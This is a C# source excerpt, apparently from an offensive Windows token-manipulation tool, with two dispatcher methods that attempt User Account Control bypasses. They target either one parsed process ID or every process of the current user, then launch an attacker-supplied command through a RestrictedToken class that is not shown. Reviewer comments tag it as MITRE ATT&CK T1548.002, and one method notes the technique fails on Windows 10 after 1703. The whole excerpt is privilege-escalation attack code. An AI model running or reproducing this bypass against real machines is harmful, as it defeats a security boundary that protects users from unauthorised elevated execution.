////////////////////////////////////////////////////////////////////////////////
// UAC bypass through RestrictedToken: one parsed target, or every enumerated
// process of the current user
////////////////////////////////////////////////////////////////////////////////
/// <summary>
/// Dispatches a UAC bypass attempt through <c>RestrictedToken.BypassUAC</c>.
/// When <c>GetProcessID</c> succeeds on <paramref name="input"/>, exactly one
/// attempt is made against the parsed process ID with the parsed command.
/// Otherwise the processes returned by
/// <c>Enumeration.EnumerateUserProcesses(true, currentUserName)</c> are tried
/// one after another, each with the unparsed <paramref name="input"/> as the command.
/// </summary>
/// <param name="input">
/// Raw argument text. It is handed to <c>GetProcessID</c>, and passed whole as
/// the command when no process ID could be extracted from it.
/// </param>
/// <remarks>
/// NOTE(review): going by the method names, this corresponds to MITRE ATT&amp;CK
/// T1548.002 (Bypass User Account Control); the token handling itself lives in
/// RestrictedToken, outside this method. For triage, the fallback path writes
/// one "[*] Attempting Bypass with PID ..." console line per candidate process.
/// </remarks>
public static void BypassUAC(String input)
{
    Int32 targetPid;
    String targetCommand;

    if (!GetProcessID(input, out targetPid, out targetCommand))
    {
        // No usable PID in the input: fall back to every process reported for
        // the current identity. The meaning of the 'true' flag is defined by
        // EnumerateUserProcesses and is not visible here -- TODO confirm.
        String currentUser = WindowsIdentity.GetCurrent().Name;
        Dictionary<UInt32, String> candidates = Enumeration.EnumerateUserProcesses(true, currentUser);

        foreach (KeyValuePair<UInt32, String> candidate in candidates)
        {
            Console.WriteLine("\n[*] Attempting Bypass with PID {0} ({1})", candidate.Key, candidate.Value);

            // A fresh RestrictedToken per candidate, disposed before the next one.
            // Nothing RestrictedToken.BypassUAC reports back is examined here, so
            // the loop always runs through every enumerated process.
            using (RestrictedToken perProcessToken = new RestrictedToken())
            {
                // UInt32 -> Int32 narrowing cast, as RestrictedToken.BypassUAC expects an Int32 PID.
                perProcessToken.BypassUAC((Int32)candidate.Key, input);
            }
        }

        return;
    }

    // Targeted path: a single attempt against the PID and command parsed from the input.
    using (RestrictedToken token = new RestrictedToken())
    {
        token.BypassUAC(targetPid, targetCommand);
    }
}
////////////////////////////////////////////////////////////////////////////////
// UAC Token Magic - Deprecated
////////////////////////////////////////////////////////////////////////////////
/// <summary>
/// Deprecated variant of the RestrictedToken-based UAC bypass dispatcher. It
/// first prints a notice that the approach no longer works on Windows 10
/// versions after 1703, then calls <c>RestrictedToken.BypassUAC</c> either once
/// (when <c>cLP.Remote</c> is set) or once per process returned by
/// <c>UserSessions.EnumerateUserProcesses(true, currentUserName)</c>.
/// </summary>
/// <param name="cLP">
/// Parsed command line; this method reads <c>Remote</c>, <c>ProcessID</c> and <c>Command</c>.
/// </param>
/// <param name="hToken">
/// Token handle passed unchanged to every <c>RestrictedToken</c> constructed here.
/// Who owns and closes the handle is not visible in this method -- TODO confirm.
/// </param>
/// <remarks>
/// NOTE(review): going by the banner and method names, this corresponds to
/// MITRE ATT&amp;CK T1548.002 (Bypass User Account Control). The version limit
/// comes only from the notice string below and is not verified here.
/// </remarks>
private static void _BypassUAC(CommandLineParsing cLP, IntPtr hToken)
{
    Console.WriteLine("[*] Notice: This no longer working on versions of Windows 10 > 1703");

    if (!cLP.Remote)
    {
        // No explicit target requested: walk every process reported for the
        // current identity. The meaning of the 'true' flag is defined by
        // EnumerateUserProcesses and is not visible here -- TODO confirm.
        string currentUser = WindowsIdentity.GetCurrent().Name;
        Dictionary<uint, string> candidates = UserSessions.EnumerateUserProcesses(true, currentUser);

        foreach (KeyValuePair<uint, string> candidate in candidates)
        {
            Console.WriteLine("\n[*] Attempting Bypass with PID {0} ({1})", candidate.Key, candidate.Value);

            // One RestrictedToken per candidate, disposed before the next attempt.
            // The outcome of each attempt is not inspected, so every entry is tried.
            using (RestrictedToken perProcessToken = new RestrictedToken(hToken))
            {
                perProcessToken.BypassUAC((int)candidate.Key, cLP.Command);
            }
        }

        return;
    }

    // Explicit target: a single attempt against the PID supplied on the command line.
    using (RestrictedToken token = new RestrictedToken(hToken))
    {
        token.BypassUAC(cLP.ProcessID, cLP.Command);
    }
}